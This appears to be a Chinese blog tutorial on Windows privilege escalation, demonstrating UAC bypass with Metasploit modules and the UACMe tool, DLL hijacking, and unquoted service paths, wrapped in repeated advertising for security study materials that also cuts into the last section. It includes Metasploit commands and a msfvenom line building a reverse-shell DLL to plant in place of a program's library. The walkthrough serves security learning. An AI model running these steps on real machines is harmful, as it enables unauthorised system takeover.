Windows权限提升—BypassUAC、DLL劫持、引号路径、服务权限等提权(1)

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！

王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。

对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！

【完整版领取方式在文末！！】

93道网络安全面试题

内容实在太多，不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

1️⃣零基础入门

① 学习路线

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供：

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

2.1. UAC设置

• 始终通知：这是最严格的设置，每当有程序需要使用高级别的权限时都会提示本地用户
• 仅在程序试图更改我的计算机时通知我：这是UAC的默认设置。当本地Windows程序要使用高级别的权限时，不会通知用户。但是，当第三方程序要使用高级别的权限时，会提示本地用户
• 仅在程序试图更改我的计算机时通知我(不降低桌面的亮度)：与上一条设置的要求相同，但在提示用户时不降低桌面的亮度
• 从不提示：当用户为系统管理员时，所有程序都会以最高权限运行

2.2. MSF绕过UAC

这里我就不演示如何设置监听与生成木马了，在前面的文章中都提到相关的操作。

2.2.1. Windows7系统案例

这里是基于默认等级的哦，如果被设置为最高的话，那就凉凉了，因为需要人为去点击，但是我们正常需要提权都是由于我们获取的权限太低，或者远程桌面打不开，你如何去点击，都无法点击了，何谈提权。

2.2.1.1. UAC状态

这里的UAC状态是默认，也就是中等级别，至于打开这个UAC可以在运行框中输入"msconfig",然后工具一栏就能看到更改UAC设置。

一般UAC关闭的情况下使用getsystem就能够提权成功。

2.2.1.2. 尝试getsystem提权

这里在尝试使用getsystem提权，发现无法提权，那么就需要使用UAC进行绕过了。

background  ##将会话置于后台，不然会在使用bypass的找不到会话。

2.2.1.3. 搜索UAC绕过bypass方式

这里能够看到有很多的UAC绕过的bypass方式，但是这里面是分不同Windows版本的，有的可能在Windows7上能用，有的可能就不能用，不过最好选择日期靠近的，这样成功率大一点。

search uac  ##搜索

2.2.1.4. 尝试使用UAC绕过提权

use exploit/windows/local/bypassuac   ##选择bypass
sessions         ##选择会话
set session 1    ##设定会话
set lport 5555   ##设定反弹端口，这里不设置也可以，但是有时候直接反弹回来，会出现反弹不成功的情况。
run  ##执行

2.2.1.5. 查看反弹效果

通过反弹回来的效果能够看到，成功提权了。

2.2.2. Windows10系统案例

这里还是使用默认的UAC等级进行提权。

2.2.2.1. 尝试getsystem提权

可以看到，这里同样是提权失败。

2.2.2.2. 尝试使用UAC绕过提权

这里我也是尝试了好几个bypass才成功的，环境不同，可能使用到的bypass也是不同的，有些bypass需要也能提权，但是需要点击确定，所以多尝试尝试。

use exploit/windows/local/bypassuac_silentcleanup   ##选择模块
sessions    ##选择会话
set session 5   ##设置会话
set lport 6666  ##设置监听端口
run   ##执行

2.2.2.3. 查看反弹效果

这里能够看到是成功提权了。

2.3. UACMe工具绕过UAC

这里我就不搭建WEB环境了，UACMe提取可以在低权限的时候提权，但是同样在UAC设置为高的时候同样也是无法进行直接提权的，需要人为的去点击确定才可以。

UACMe工具涵盖了Windows7-11以及server服务器系统均可以提权。

同时这里我就演示个Windows10系统的，至于Windows7肯定要比Windows10好提权。

2.3.1. 下载链接

注意想要使用这个工具需要对其进行编译成功.exe文件，而我这里没有最新的.exe文件，这里给个老版的，但是也没差到哪里去，具体使用的介绍建议去GitHub上自己看。

UACMe

百度网盘UACMe 提取码：86lm

2.3.2. Windows10系统案例

这里在下载完UACMe的时候，里面会有两个exe执行文件，一个是32位的，一个是64位的，按照不同的系统位数，放入不同的exe文件进行执行。

2.3.2.1. 系统内操作

注意这里弹出的窗口只是演示，在实际的环境中，我们无法登录桌面，可以使用改工具去运行木马后门，让其上线即可。

至于编号，新版的UACMe里包含70余种，可以一个一个尝试。

语法：Akagi64.exe 编号

2.3.2.2. 反弹上线

这里同样我们监听一下端口，并且利用工具进行反弹上线。

语法：Akagi64.exe 编号 后门程序地址

2.3.2.3. 查看权限

这里反弹上来的可能还是普通管理员权限，这里可以使用getsystem进行再次提权，可以看到成功提权。

3. dll劫持提权

3.1. Windows10系统案例

Windows 程序启动的时候需要 DLL。如果这些 DLL 不存在，则可以通过在应用程序要查找的位置放置恶意 DLL 来提权。通常，Windows 应用程序有其预定义好的搜索 DLL 的路径。

它会根据下面的顺序进行搜索：

1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录 Current Working Directory，CWD
6、在 PATH 环境变量的目录（先系统后用户）

程序运行一般会加载系统dll或本身程序自带的dll，如果我们将程序执行时需要加载的dll文件替换成程序，那么我们下次在启动程序时所加载的dll就是我们替换的那个木马程序了。

3.1.1. 收集进程加载的dll

这里会出现一个问题，没有远程桌面我们如何收集，这里其实有个很简单的办法就是，通过上线普通木马后，看看能不能查看有存在哪些服务，然后找到相关服务本地安装，安装后使用火绒剑等工具进行查找加载的dll文件即可。

像系统文件加载的dll我们是动不了的，我们一般能懂的都是未知文件和数字签名文件。

3.1.2. MSF制作dll木马

这里我们选中libeay32.dll文件，我们就制作这个木马。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.20  lport=5566 -f dll >libeay32.dll

3.1.3. 替换dll文件

这里将生成的dll文件替换原本的dll。

3.1.4. 运行软件

运行软件，不过需要注意的是，在实际环境中由于我未获取到桌面权限，所以需要等待管理员去运行，同时由于我们替换了dll文件，所以会导致管理员在运行软件的时候会出现无响应的情况，这时无法保证，管理员会卸载重新安装。

3.1.5. 设置监听

这里设置监听，当管理员去运行软件的时候就会上线，像上面提到的，当软件不能用了，无法保证管理员不会卸载重装或者重启电脑，所以在获取权限后需要及时的移植到其它进程上面。

可以看到的是成功上线了。

3.1.6. 提权

我这里没有提权成功，可能是由于系统问题，但是调试了半天也没成功，这也能够证明不是所有提权方式都是能够百分比提权成功的，这里也只是演示，可以用这个方式进行提权。

3.2. Windows2012系统案例

前面的分析与劫持等步骤就不在赘述了，直接看案效果把。

可以看到这里使用Windows2012就能够成功提权，所以之前提到的有些提权方式是根据不同系统可能有不同的效果。

4. 不带引号服务路径配合

注意提权方式和操作系统版本等都没有任何关系。

当Windows服务运行时，会发生以下两种情况之一。如果给出了可执行路径，并且引用了完整路径，则系统会按字面解释它并执行。但是，如果服务的二进制路径未包含在引号中，则操作系统将会执行找到的空格分隔的服务路径的第一个实例。

不过这个确实局限性还是很大的，比如虚拟机中没有找到这样的情况，实体机没有找到，客户现场机器也没找到…同时还有一个问题是就算有，很多都是在C盘中，如果基本权限不够大，那么也凉凉，也用不了。

4.1. 介绍案例

这里的图片我借用一下其它博客的，由于我自己电脑以及其它电脑，虚拟机都没有这样的路径。

次序执行
c:\program.exe
c:\program files.exe
c:\program files (x86)\grasssoft\macro.exe
c:\program files (x86)\grasssoft\macro expert\MacroService.exe

4.2. 查看系统中错误配置的路径

而通过下面的语句可以判断系统中是否存在这类问题，这里找到不代表就一定会存在问题，你看下面的图片明显无法进行替换。

### 一、网安学习成长路线图


网安所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/aa7be04dc8684d7ea43acc0151aebbf1.png)


### 二、网安视频合集


观看零基础学习视频，看视频学习是最快捷也是最有效果的方式，跟着视频中老师的思路，从基础到深入，还是很容易入门的。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/f0aeee2eec7a48f4ad7d083932cb095d.png)


### 三、精品网安学习书籍


当我学到一定基础，有自己的理解能力的时候，会去阅读一些前辈整理的书籍或者手写的笔记资料，这些笔记详细记载了他们对一些技术点的理解，这些理解是比较独到，可以学到不一样的思路。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/078ea1d4cda342f496f9276a4cda5fcf.png)


### 四、网络安全源码合集+工具包


光学理论是没用的，要学会跟着一起敲，要动手实操，才能将自己的所学运用到实际当中去，这时候可以搞点实战案例来学习。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/e54c0bac8f3049928b488dc1e5080fc5.png)


### 五、网络安全面试题


最后就是大家最关心的网络安全面试题板块  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/15c1192cad414044b4dd41f3df44433d.png)![在这里插入图片描述](https://img-blog.csdnimg.cn/b07abbfab1fd4edc800d7db3eabb956e.png)  



**网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友，可以点击这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

**一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**